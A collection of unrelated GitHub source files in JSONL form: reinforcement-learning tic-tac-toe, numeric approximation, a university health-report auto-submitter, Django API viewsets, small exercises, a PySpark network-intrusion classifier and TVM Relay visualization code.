range(self.BOARD_SIZE):\n if abs(sum(self.board[:, i])) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(self.board[:, i])))\n return True, 0\n\n # check negative diagonal\n if abs(sum(np.diagonal(self.board))) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(np.diagonal(self.board))))\n return True, 0\n\n # check negative diagonal\n if abs(sum(np.diagonal(np.fliplr(self.board)))) == self.BOARD_SIZE:\n self.winner = int(np.sign(sum(np.diagonal(np.fliplr(self.board)))))\n return True, 0\n\n # check if draw\n if not self.legal_moves:\n self.winner = 0\n return True, 1\n\n return False, 0\n\n def get_reward(self, done: bool, tie: bool) -> int:\n if done:\n if tie:\n return self.TIE_REWARD\n elif self.winner == 1:\n return self.WIN_REWARD\n else:\n return self.LOSE_REWARD\n else:\n return self.MOVE\n\n\nif __name__ == '__main__':\n # load the model\n trained_model = PPO.load(\"tictactoe_model_3x3_PPO\")\n for _ in range(5):\n env = LearningTicTacToe(trained_model)\n model = PPO('MlpPolicy', env, verbose=1)\n model.learn(total_timesteps=10_000)\n trained_model = model\n\n # save the model\n trained_model.save(\"adversarial_tictactoe_model_3x3_PPO\")\n\n","repo_name":"nicholasg1997/Projects","sub_path":"TicTacToe_AI/TicTacToe_v2.py","file_name":"TicTacToe_v2.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12082689024","text":"import math\nimport numpy as np\nimport pylab\n\n\ndef func(x):\n return math.sin(x / 5) * math.exp(x / 10) + 5 * math.exp(-x / 2)\n\n# Строим график\nxmin = 1.0\nxmax = 15.0\ndx = 0.01\nxlist = np.arange(xmin, xmax, dx)\nylist = [func(x) for x in xlist]\npylab.plot(xlist, ylist)\n# Исходный график синего цвета\n\n# 2 точки\nA = np.array([[1, 1], [1, 15]])\nb = np.array([func(1), func(15)])\nxres = np.linalg.solve(A, b)\nyres = [(xres[0]+xres[1]*x) for x in xlist]\npylab.plot(xlist, yres)\n# График оранжевого цвета\n# Плохо апроксимирует\n\n# 3 точки\nA = np.array([[1, 1, 1], [1, 8, 64], [1, 15, 225]])\nb = np.array([func(1), func(8), func(15)])\nxres = np.linalg.solve(A, b)\nyres = [(xres[0]+xres[1]*x+xres[2]*x*x) for x in xlist]\npylab.plot(xlist, yres)\n# График зеленого цвета\n# Плохо апроксимирует, но но лучше прошлого\n\n# 4 точки\nA = np.array([[1, 1, 1, 1], [1, 4, 16, 64], [1, 10, 100, 1000], [1, 15, 225, 3375]])\nb = np.array([func(1), func(4), func(10), func(15)])\nxres = np.linalg.solve(A, b)\nprint(xres)\nyres = [(xres[0]+xres[1]*x+xres[2]*x*x+xres[3]*x*x*x) for x in xlist]\npylab.plot(xlist, yres)\n# График красного цвета\n# Хорошо апроксимирует\npylab.show()\n","repo_name":"zhizhin-ik/4semestr","sub_path":"laboratory_17/task_17.3.py","file_name":"task_17.3.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"73012898871","text":"# -*- coding: UTF-8 -*-\nimport time\nimport requests\n\nurl = \"https://app.ucas.ac.cn/ucasncov/api/default/save\" # 学院填报接口\ntoken = \"\" # pushplus token\ntitle= '每日疫情填报结果' #改成你要的标题内容\nmes_url=\"http://www.pushplus.plus/customer/push/send\"# pushplus推送url,无需更改\ncookies = {\n \"eai-sess\": \"\",\n \"UUkey\": \"\"\n}\n\ndata = {\n \"realname\": \"\", # 姓名\n \"number\": \"\", # 学号\n \"date\": time.strftime(\"%Y-%m-%d\", time.localtime()),\n \"jzdz\":\"北京市怀柔区雁栖湖\",# 在京地址\n \"zrzsdd\":\"1\",# 昨日住宿地点\n \"sfzx\": \"1\", # 是否在校\n \"szgj\": \"中国\", # 所在国家\n \"szdd\": \"国内\", # 所在地点\n \"dqszdd\":\"1\", #当前所在地点\n \"geo_api_info\": \"{\\\"address\\\":\\\"北京市怀柔区\\\",\\\"details\\\":\\\"中国科学院大学雁栖湖校区)\\\",\\\"province\\\":{\\\"label\\\":\\\"北京市\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"area\\\":{\\\"label\\\":\\\"海淀区\\\",\\\"value\\\":\\\"\\\"}}\",\n \"szgj_api_info\": \"{\\\"area\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"address\\\":\\\"\\\",\\\"country\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"details\\\":\\\"\\\",\\\"province\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"}}\",\n \"created\":\"1663549596\", # 不明信息\n \"dqsfzzgfxdq\":\"4\", #当前是否在中高风险地区\n \"zgfxljs\":\"4\", # 中高风险旅居史\n \"tw\": \"1\", # 体温选项序号\n \"sffrzz\":\"0\", #是否发热\n \"dqqk1\":\"1\", #当前情况\n \"dqqk2\":\"1\", #当前情况2(健康宝\n \"sfjshsjc\":\"1\", #是否接受核酸检测\n \"old_szdd\": \"国内\",\n \"old_city\": \"{\\\"address\\\":\\\"北京市怀柔区\\\",\\\"details\\\":\\\"中国科学院大学雁栖湖校区)\\\",\\\"province\\\":{\\\"label\\\":\\\"北京市\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"area\\\":{\\\"label\\\":\\\"海淀区\\\",\\\"value\\\":\\\"\\\"}}\",\n \"geo_api_infot\": \"{\\\"address\\\":\\\"\\\",\\\"details\\\":\\\"\\\",\\\"country\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"province\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"city\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"},\\\"area\\\":{\\\"label\\\":\\\"\\\",\\\"value\\\":\\\"\\\"}}\",\n \"app_id\": \"ucas\",\n}\n\nresult = requests.post(url=url, data=data,cookies=cookies)\n\nif mes_url:\n if result.text[5] == \"0\":\n content=\"填报成功!感谢使用\"\n elif result.text[5] == \"1\":\n content=\"今天已经填报过了哦!\"\n else:\n content=\"总觉得哪里不对,快去看看吧\"\n url = 'http://www.pushplus.plus/send?token='+token+'&title='+title+'&content='+content\n requests.get(url)\n print(\"运行结束\")\n\n\n\n","repo_name":"Edward-lyz/UCAS-checkhelper","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"23559813431","text":"from rest_framework import viewsets\nfrom xadmin_api.custom import XadminViewSet\nfrom users.models import UserProfile, EmailVerifyRecord, Banner\nfrom courses.models import Course, Lesson, Video, CourseResource\nfrom operation.models import UserAsk, CourseComments, UserFavorite, UserMessage, UserCourse\nfrom organization.models import CityDict, CourseOrg, Teacher\n\nfrom xadmin_api.auto_serializers import UserProfileSerializer, EmailVerifyRecordSerializer, BannerSerializer, CourseSerializer, LessonSerializer, \\\n VideoSerializer, CourseResourceSerializer, UserAskSerializer, CourseCommentsSerializer, UserFavoriteSerializer, UserMessageSerializer, \\\n UserCourseSerializer, CityDictSerializer, CourseOrgSerializer, TeacherSerializer\nfrom xadmin_api.auto_filters import UserProfileFilter, EmailVerifyRecordFilter, BannerFilter, CourseFilter, LessonFilter, VideoFilter, \\\n CourseResourceFilter, UserAskFilter, CourseCommentsFilter, UserFavoriteFilter, UserMessageFilter, UserCourseFilter, CityDictFilter, \\\n CourseOrgFilter, TeacherFilter\n\n\nclass UserProfileViewSet(XadminViewSet):\n serializer_class = UserProfileSerializer\n queryset = UserProfile.objects.all()\n filter_class = UserProfileFilter\n search_fields = [\"password\", \"username\", \"first_name\", \"last_name\", \"email\", \"nick_name\", \"gender\", \"address\", \"mobile\"]\n\n\nclass EmailVerifyRecordViewSet(XadminViewSet):\n serializer_class = EmailVerifyRecordSerializer\n queryset = EmailVerifyRecord.objects.all()\n filter_class = EmailVerifyRecordFilter\n search_fields = [\"code\", \"email\", \"send_type\"]\n\n\nclass BannerViewSet(XadminViewSet):\n serializer_class = BannerSerializer\n queryset = Banner.objects.all()\n filter_class = BannerFilter\n search_fields = [\"title\", \"url\"]\n\n\nclass CourseViewSet(XadminViewSet):\n serializer_class = CourseSerializer\n queryset = Course.objects.all()\n filter_class = CourseFilter\n search_fields = [\"name\", \"degree\", \"you_need_know\", \"teacher_tell\", \"category\", \"tag\"]\n\n\nclass LessonViewSet(XadminViewSet):\n serializer_class = LessonSerializer\n queryset = Lesson.objects.all()\n filter_class = LessonFilter\n search_fields = [\"name\"]\n\n\nclass VideoViewSet(XadminViewSet):\n serializer_class = VideoSerializer\n queryset = Video.objects.all()\n filter_class = VideoFilter\n search_fields = [\"url\", \"name\"]\n\n\nclass CourseResourceViewSet(XadminViewSet):\n serializer_class = CourseResourceSerializer\n queryset = CourseResource.objects.all()\n filter_class = CourseResourceFilter\n search_fields = [\"name\"]\n\n\nclass UserAskViewSet(XadminViewSet):\n serializer_class = UserAskSerializer\n queryset = UserAsk.objects.all()\n filter_class = UserAskFilter\n search_fields = [\"name\", \"mobile\", \"course_name\"]\n\n\nclass CourseCommentsViewSet(XadminViewSet):\n serializer_class = CourseCommentsSerializer\n queryset = CourseComments.objects.all()\n filter_class = CourseCommentsFilter\n search_fields = [\"comments\"]\n\n\nclass UserFavoriteViewSet(XadminViewSet):\n serializer_class = UserFavoriteSerializer\n queryset = UserFavorite.objects.all()\n filter_class = UserFavoriteFilter\n search_fields = []\n\n\nclass UserMessageViewSet(XadminViewSet):\n serializer_class = UserMessageSerializer\n queryset = UserMessage.objects.all()\n filter_class = UserMessageFilter\n search_fields = [\"message\"]\n\n\nclass UserCourseViewSet(XadminViewSet):\n serializer_class = UserCourseSerializer\n queryset = UserCourse.objects.all()\n filter_class = UserCourseFilter\n search_fields = []\n\n\nclass CityDictViewSet(XadminViewSet):\n serializer_class = CityDictSerializer\n queryset = CityDict.objects.all()\n filter_class = CityDictFilter\n search_fields = [\"name\", \"desc\"]\n\n\nclass CourseOrgViewSet(XadminViewSet):\n serializer_class = CourseOrgSerializer\n queryset = CourseOrg.objects.all()\n filter_class = CourseOrgFilter\n search_fields = [\"name\", \"category\", \"tag\", \"address\"]\n\n\nclass TeacherViewSet(XadminViewSet):\n serializer_class = TeacherSerializer\n queryset = Teacher.objects.all()\n filter_class = TeacherFilter\n search_fields = [\"name\", \"work_company\", \"work_position\", \"points\"]\n","repo_name":"imfht/djangoapps","sub_path":"OnlineMooc-master/xadmin_api/auto_views.py","file_name":"auto_views.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"26059364173","text":"class BST:\n def __init__(self):\n self.root = None\n def setRoot(self,node):\n self.root = node\n def insert(self, data):\n if self.root == None:\n self.root = Node(data)\n elif self.root != None:\n p=self.root\n while(p!=None):\n if data >= p.data:\n if p.right == None:\n p.right = Node(data)\n break\n p=p.right\n\n elif data < p.data:\n if p.left == None:\n p.left = Node(data)\n break\n p=p.left\n \n def printTree(self, node, level = 0):\n if node != None:\n self.printTree(node.right, level + 1)\n print(' ' * level, node)\n self.printTree(node.left, level + 1)\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n \n def __str__(self):\n return str(self.data)\n\ndef closestValue(root,vaule):\n if root == None:\n return\n closestValue(root.left,vaule)\n newLis.append(root.data)\n closestValue(root.right,vaule)\n\n for i in range(len(newLis)):\n if vaule <= newLis[0]:\n return newLis[0]\n elif i+1 < len(newLis) and newLis[i] < vaule and newLis[i+1] >= vaule:\n return newLis[i+1]\n elif i+1 == len(newLis):\n return newLis[len(newLis)-1]\n \n\ninp,val=input('Enter Input : ').split('/')\ninpLis = [int(e) for e in inp.split()]\nnewLis=[]\nT = BST()\nfor data in inpLis:\n T.insert(data)\n T.printTree(T.root)\n print('--------------------------------------------------')\nans=closestValue(T.root,int(val))\nprint('Closest value of {0} : '.format(str(val))+str(ans))\n","repo_name":"SroLyQ/DataStructCode","sub_path":"Lab08-AVLTree/02-ClosestValue.py","file_name":"02-ClosestValue.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"10867833963","text":"'''\nGiven an array of strings, return another array containing all of its longest strings.\n\nExample\n\nFor inputArray = [\"aba\", \"aa\", \"ad\", \"vcd\", \"aba\"], the output should be\nallLongestStrings(inputArray) = [\"aba\", \"vcd\", \"aba\"].\n'''\n\n\ndef allLongestStrings(arr):\n max_len = 0\n output = []\n\n for chars in arr:\n max_len = max(len(chars), max_len)\n\n for char in arr:\n if len(char) == max_len:\n output.append(char)\n\n return output\n\n\ndef longestStringsListComp(arr):\n max_len = max(len(string) for string in arr)\n output = [string for string in arr if len(string) == max_len]\n return output\n\n\ninputArray = [\"aba\", \"aa\", \"ad\", \"vcd\", \"aba\"]\n\nprint(allLongestStrings(inputArray))\n","repo_name":"rjcrter11/leetChallenges","sub_path":"arrays/all_longest_strings.py","file_name":"all_longest_strings.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"37804493288","text":"import pandas as pd\nimport findspark\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql import SparkSession\nfrom pyspark.ml.feature import StringIndexer, OneHotEncoder, VectorAssembler\nfrom pyspark.sql.functions import col,isnan, when, count\nfrom pyspark.ml.classification import DecisionTreeClassifier, LogisticRegression, RandomForestClassifier\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\n\nfrom sklearn.metrics import accuracy_score, f1_score,precision_score, recall_score\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.style.use('ggplot')\n\nfindspark.init()\nsc = pyspark.SparkContext\nspark = SparkSession.builder.master(\"local[1]\").appName(\"assignment\").getOrCreate()\n\n# reading the data\ndata_desc = pd.read_csv('UNSW-NB15_features.csv', encoding = \"ISO-8859-1\")\ncols = data_desc['Name'].to_list()\ndata_types = data_desc['Type '].to_list()\ndata_types = list(map(str.lower,data_types))\n\ndata = spark.read.option(\"header\",False).csv(\"UNSW-NB15.csv\")\n\n\nfor old,new, dtype in zip(data.columns, cols, data_types):\n data = data.withColumnRenamed(old, new)\n if dtype == \"nominal\":\n pass\n if dtype == \"integer\":\n data = data.withColumn(new,data[new].cast('integer'))\n if dtype == \"float\":\n data = data.withColumn(new,data[new].cast('float'))\n if dtype == \"binary\":\n data = data.withColumn(new,data[new].cast('integer'))\n if dtype == \"timestamp\":\n data = data.withColumn(new,data[new].cast('timestamp'))\n\n\n#dropping columns/features that are not required\ndata = data.drop('srcip', 'dstip', 'sport','dsport', 'Stime','Ltime')\n\n#fixing the attack category rows for fuzzers and reconnaissance\ndata = data.withColumn('attack_cat', when(data['attack_cat'] == 'Fuzzers ', 'Fuzzers').otherwise(data['attack_cat']))\ndata = data.withColumn('attack_cat', when(data['attack_cat'] == 'Reconnaissance ', 'Reconnaissance').otherwise(data['attack_cat']))\ndata = data.na.fill('Normal', subset=['attack_cat'])\n\n#dropping duplicate data\ndata = data.drop_duplicates()\n\ndata = data.dropna(how='any')\nprint(data.columns)\n\nstring_cols = ['proto', 'state', 'service', 'attack_cat']\nindexed_cols = [col+'_index' for col in string_cols]\nindexer = StringIndexer(inputCols=string_cols, outputCols=indexed_cols)\nindexed = indexer.fit(data).transform(data)\nstring_cols.remove('attack_cat')\nindexed_cols.remove('attack_cat_index')\nattack_cat_index = indexed.select('attack_cat_index')\nindexed = indexed.drop('attack_cat_index', 'attack_cat')\nencoded_cols = [col+'_encoded' for col in indexed_cols]\nencoder = OneHotEncoder(inputCols=indexed_cols, outputCols=encoded_cols)\nencoded = encoder.fit(indexed).transform(indexed)\n\ncols_to_remove = string_cols + indexed_cols\nfeature_cols = encoded.columns\nfor col in cols_to_remove:\n feature_cols.remove(col)\n\nfeature_cols.remove('Label')\nassembler = VectorAssembler(inputCols=feature_cols,outputCol=\"features\")\noutput = assembler.transform(encoded)\n\n# Split the data into training and test sets\n(trainingData, testData) = output.randomSplit([0.7, 0.3],seed=555)\n\n# Train a DecisionTree model.\ndt = DecisionTreeClassifier(labelCol=\"Label\", featuresCol=\"features\")\n\nprint(\"Decision tree Training started \")\ndt_model = dt.fit(trainingData)\nprint(\"Training ended\")\n\n# Make predictions.\nprint(\"testing started\")\ndt_predictions = dt_model.transform(testData)\nprint(\"testing ended\")\n\ndt_pandas = dt_predictions.toPandas()\ndt_acc = accuracy_score(dt_pandas['Label'],dt_pandas['prediction'])\ndt_rec = recall_score(dt_pandas['Label'],dt_pandas['prediction'])\ndt_prec = precision_score(dt_pandas['Label'],dt_pandas['prediction'])\ndt_f1 = f1_score(dt_pandas['Label'],dt_pandas['prediction'])\n\n# Select (prediction, true label) and compute test error\nevaluator = BinaryClassificationEvaluator(labelCol=\"Label\")\ndt_roc = evaluator.evaluate(dt_predictions)\n\n\n\nlr = LogisticRegression(featuresCol = 'features', labelCol = 'Label', maxIter=10)\nprint(\"Logistic regression traing started\")\nlrModel = lr.fit(trainingData)\nprint(\"training ended\")\nlr_predictions = lrModel.transform(testData)\n\nlr_pandas = lr_predictions.toPandas()\nlr_acc = accuracy_score(lr_pandas['Label'],lr_pandas['prediction'])\nlr_rec = recall_score(lr_pandas['Label'],lr_pandas['prediction'])\nlr_prec = precision_score(lr_pandas['Label'],lr_pandas['prediction'])\nlr_f1 = f1_score(lr_pandas['Label'],lr_pandas['prediction'])\nevaluator = BinaryClassificationEvaluator(labelCol=\"Label\")\nlr_roc = evaluator.evaluate(lr_predictions)\n\n\nrf = RandomForestClassifier(featuresCol= 'features', labelCol='Label')\nprint(\"Random forest model training started\")\nrf_model = rf.fit(trainingData)\nprint(\"training complete\")\nrf_predictions = rf_model.transform(testData)\n\nrf_pandas = rf_predictions.toPandas()\nrf_acc = accuracy_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_rec = recall_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_prec = precision_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_f1 = f1_score(rf_pandas['Label'],rf_pandas['prediction'])\nrf_roc = evaluator.evaluate(rf_predictions)\n\n\nprint(\"-------------------------RESULTS-------------------------\")\nprint(\"Decision tree\")\nprint(\"---------------------------------------------------------\")\nprint(\"Accuracy\", dt_acc)\nprint(\"Recall\", dt_rec)\nprint(\"Precision\", dt_prec)\nprint(\"F1 Score\", dt_f1)\nprint(\"ROC\", dt_roc)\nprint(\"----------------------------------------------------------\")\n\nprint(\"Logistic regression\")\nprint(\"---------------------------------------------------------\")\nprint(\"Accuracy\", lr_acc)\nprint(\"Recall\", lr_rec)\nprint(\"Precision\", lr_prec)\nprint(\"F1 score\", lr_f1)\nprint(\"ROC\", lr_roc)\nprint(\"----------------------------------------------------------\")\n\nprint(\"Random Forest\")\nprint(\"---------------------------------------------------------\")\nprint(\"Accuracy\", rf_acc)\nprint(\"Recall\", rf_rec)\nprint(\"Precision\", rf_prec)\nprint(\"F1 score\", rf_f1)\nprint(\"ROC\", rf_roc)\nprint(\"----------------------------------------------------------\")\n\n'''\n\nlr_predictions = lrModel.transform(testData)\n\ntrainingSummary = lrModel.summary\nroc = trainingSummary.roc.toPandas()\nplt.plot(roc['FPR'],roc['TPR'])\nplt.ylabel('False Positive Rate')\nplt.xlabel('True Positive Rate')\nplt.title('ROC Curve')\nplt.show()\nprint('Training set areaUnderROC: ' + str(trainingSummary.areaUnderROC))\n'''\n'''\ntreeModel = dt_model.stages[2]\n# summary only\nprint(treeModel)\n'''\n#https://towardsdatascience.com/machine-learning-with-pyspark-and-mllib-solving-a-binary-classification-problem-96396065d2aa","repo_name":"timothymadegwa/big_data","sub_path":"binary_classifier.py","file_name":"binary_classifier.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41751156316","text":"import pytest as pytest\nfrom bs4 import BeautifulSoup\n\nimport scrape\n\n\ndef test_soup():\n with open(\"petition_example.html\", mode=\"rb\") as file:\n html_binary_list = file.readlines()\n html_strings_list = [html_bin.decode(\"utf-8\") for html_bin in html_binary_list]\n html_text = \"\\n\".join(html_strings_list)\n soup = BeautifulSoup(html_text, \"html.parser\")\n\n h1 = soup.find(\"h1\")\n assert h1.text == \"\"\"Protect the Environment – support carbon neutral energy alternatives\"\"\"\n\n\n@pytest.fixture\ndef soup():\n with open(\"petition_example.html\", mode=\"rb\") as file:\n html_binary_list = file.readlines()\n html_strings_list = [html_bin.decode(\"utf-8\") for html_bin in html_binary_list]\n html_text = \"\\n\".join(html_strings_list)\n return BeautifulSoup(html_text, \"html.parser\")\n\n\ndef test_get_petition_name(soup: BeautifulSoup):\n assert scrape.get_petition_name(soup) == \"\"\"Protect the Environment – support carbon neutral energy alternatives\"\"\"\n\n","repo_name":"taraskuzyk/british_parliament_scrape","sub_path":"test_scrape.py","file_name":"test_scrape.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20946080363","text":"import abc\nfrom typing import (\n Dict,\n Union,\n Tuple,\n List,\n)\n\nimport tvm\nfrom tvm import relay\n\nUNKNOWN_TYPE = \"unknown\"\n\n\nclass VizNode:\n \"\"\"VizNode carry node information for `VizGraph` interface.\n\n Parameters\n ----------\n node_id: str\n Unique identifier for this node.\n node_type: str\n Type of this node.\n node_detail: str\n Any supplement for this node such as attributes.\n \"\"\"\n\n def __init__(self, node_id: str, node_type: str, node_detail: str):\n self._id = node_id\n self._type = node_type\n self._detail = node_detail\n\n @property\n def identity(self) -> str:\n return self._id\n\n @property\n def type_name(self) -> str:\n return self._type\n\n @property\n def detail(self) -> str:\n return self._detail\n\n def __repr__(self) -> str:\n detail = self._detail.replace(\"\\n\", \", \")\n return f\"VizNode(identity: {self._id}, type_name: {self._type}, detail: {detail}\"\n\n\nclass VizEdge:\n \"\"\"VizEdge connect two `VizNode`.\n\n Parameters\n ----------\n start_node: str\n The identifier of the node starting the edge.\n end_node: str\n The identifier of the node ending the edge.\n \"\"\"\n\n def __init__(self, start_node: str, end_node: str):\n self._start_node = start_node\n self._end_node = end_node\n\n @property\n def start(self) -> str:\n return self._start_node\n\n @property\n def end(self) -> str:\n return self._end_node\n\n\nclass VizParser(abc.ABC):\n \"\"\"VizParser parses out a VizNode and VizEdges from a `relay.Expr`.\"\"\"\n\n @abc.abstractmethod\n def get_node_edges(\n self,\n node: relay.Expr,\n relay_param: Dict[str, tvm.runtime.NDArray],\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Get VizNode and VizEdges for a `relay.Expr`.\n\n Parameters\n ----------\n node : relay.Expr\n relay.Expr which will be parsed and generate a node and edges.\n\n relay_param: Dict[str, tvm.runtime.NDArray]\n relay parameters dictionary.\n\n node_to_id : Dict[relay.Expr, str]\n This is a mapping from relay.Expr to a unique id, generated by `RelayVisualizer`.\n\n Returns\n -------\n rv1 : Union[VizNode, None]\n VizNode represent the relay.Expr. If the relay.Expr is not intended to introduce a node\n to the graph, return None.\n\n rv2 : List[VizEdge]\n a list of VizEdges to describe the connectivity of the relay.Expr.\n Can be empty list to indicate no connectivity.\n \"\"\"\n\n\nclass VizGraph(abc.ABC):\n \"\"\"Abstract class for graph, which is composed of nodes and edges.\"\"\"\n\n @abc.abstractmethod\n def node(self, viz_node: VizNode) -> None:\n \"\"\"Add a node to the underlying graph.\n Nodes in a Relay IR Module are expected to be added in the post-order.\n\n Parameters\n ----------\n viz_node : VizNode\n A `VizNode` instance.\n \"\"\"\n\n @abc.abstractmethod\n def edge(self, viz_edge: VizEdge) -> None:\n \"\"\"Add an edge to the underlying graph.\n\n Parameters\n ----------\n viz_edge : VizEdge\n A `VizEdge` instance.\n \"\"\"\n\n\nclass DefaultVizParser(VizParser):\n \"\"\"DefaultVizParser provde a set of logics to parse a various relay types.\n These logics are inspired and heavily based on\n `visualize` function in https://tvm.apache.org/2020/07/14/bert-pytorch-tvm\n \"\"\"\n\n def get_node_edges(\n self,\n node: relay.Expr,\n relay_param: Dict[str, tvm.runtime.NDArray],\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n if isinstance(node, relay.Function):\n return self._function(node, node_to_id)\n if isinstance(node, relay.expr.Call):\n return self._call(node, node_to_id)\n if isinstance(node, relay.expr.Var):\n return self._var(node, relay_param, node_to_id)\n if isinstance(node, relay.expr.Tuple):\n return self._tuple(node, node_to_id)\n if isinstance(node, relay.expr.TupleGetItem):\n return self._tuple_get_item(node, node_to_id)\n if isinstance(node, relay.expr.Constant):\n return self._constant(node, node_to_id)\n # GlobalVar possibly mean another global relay function,\n # which is expected to in \"Graph\" level, not in \"Node\" level.\n if isinstance(node, (relay.expr.GlobalVar, tvm.ir.Op)):\n return None, []\n\n viz_node = VizNode(node_to_id[node], UNKNOWN_TYPE, f\"don't know how to parse {type(node)}\")\n viz_edges = []\n return viz_node, viz_edges\n\n def _var(\n self,\n node: relay.Expr,\n relay_param: Dict[str, tvm.runtime.NDArray],\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Render rule for a relay var node\"\"\"\n\n node_id = node_to_id[node]\n name_hint = node.name_hint\n node_detail = f\"name_hint: {name_hint}\"\n node_type = \"Var(Param)\" if name_hint in relay_param else \"Var(Input)\"\n\n if node.type_annotation is not None:\n if hasattr(node.type_annotation, \"shape\"):\n shape = tuple(map(int, node.type_annotation.shape))\n dtype = node.type_annotation.dtype\n node_detail = f\"{node_detail}\\nshape: {shape}\\ndtype: {dtype}\"\n else:\n node_detail = f\"{node_detail}\\ntype_annotation: {node.type_annotation}\"\n\n # only node\n viz_node = VizNode(node_id, node_type, node_detail)\n viz_edges = []\n return viz_node, viz_edges\n\n def _function(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Render rule for a relay function node\"\"\"\n node_details = []\n name = \"\"\n func_attrs = node.attrs\n if func_attrs:\n node_details = [f\"{k}: {func_attrs.get_str(k)}\" for k in func_attrs.keys()]\n # \"Composite\" might from relay.transform.MergeComposite\n if \"Composite\" in func_attrs.keys():\n name = func_attrs[\"Composite\"]\n node_id = node_to_id[node]\n\n # Body -> FunctionNode\n viz_node = VizNode(node_id, f\"Func {name}\", \"\\n\".join(node_details))\n viz_edges = [VizEdge(node_to_id[node.body], node_id)]\n return viz_node, viz_edges\n\n def _call(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n \"\"\"Render rule for a relay call node\"\"\"\n node_id = node_to_id[node]\n op_name = UNKNOWN_TYPE\n node_detail = []\n if isinstance(node.op, tvm.ir.Op):\n op_name = node.op.name\n if node.attrs:\n node_detail = [f\"{k}: {node.attrs.get_str(k)}\" for k in node.attrs.keys()]\n elif isinstance(node.op, relay.Function):\n func_attrs = node.op.attrs\n op_name = \"Anonymous Func\"\n if func_attrs:\n node_detail = [f\"{k}: {func_attrs.get_str(k)}\" for k in func_attrs.keys()]\n # \"Composite\" might from relay.transform.MergeComposite\n if \"Composite\" in func_attrs.keys():\n op_name = func_attrs[\"Composite\"]\n elif isinstance(node.op, relay.GlobalVar):\n op_name = \"GlobalVar\"\n node_detail = [f\"GlobalVar.name_hint: {node.op.name_hint}\"]\n else:\n op_name = str(type(node.op)).split(\".\")[-1].split(\"'\")[0]\n\n # Arguments -> CallNode\n viz_node = VizNode(node_id, f\"Call {op_name}\", \"\\n\".join(node_detail))\n args = [node_to_id[arg] for arg in node.args]\n viz_edges = [VizEdge(arg, node_id) for arg in args]\n return viz_node, viz_edges\n\n def _tuple(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n node_id = node_to_id[node]\n\n # Fields -> TupleNode\n viz_node = VizNode(node_id, \"Tuple\", \"\")\n viz_edges = [VizEdge(node_to_id[field], node_id) for field in node.fields]\n return viz_node, viz_edges\n\n def _tuple_get_item(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n node_id = node_to_id[node]\n\n # Tuple -> TupleGetItemNode\n viz_node = VizNode(node_id, \"TupleGetItem\", f\"idx: {node.index}\")\n viz_edges = [VizEdge(node_to_id[node.tuple_value], node_id)]\n return viz_node, viz_edges\n\n def _constant(\n self,\n node: relay.Expr,\n node_to_id: Dict[relay.Expr, str],\n ) -> Tuple[Union[VizNode, None], List[VizEdge]]:\n node_id = node_to_id[node]\n node_detail = f\"shape: {node.data.shape}, dtype: {node.data.dtype}\"\n\n # only node\n viz_node = VizNode(node_id, \"Const\", node_detail)\n viz_edges = []\n return viz_node, viz_edges\n\n\nclass Plotter(abc.ABC):\n \"\"\"Plotter can render a collection of Graph interfaces to a file.\"\"\"\n\n @abc.abstractmethod\n def create_graph(self, name: str) -> VizGraph:\n \"\"\"Create a VizGraph\n\n Parameters\n ----------\n name : str\n the name of the graph\n\n Return\n ------\n 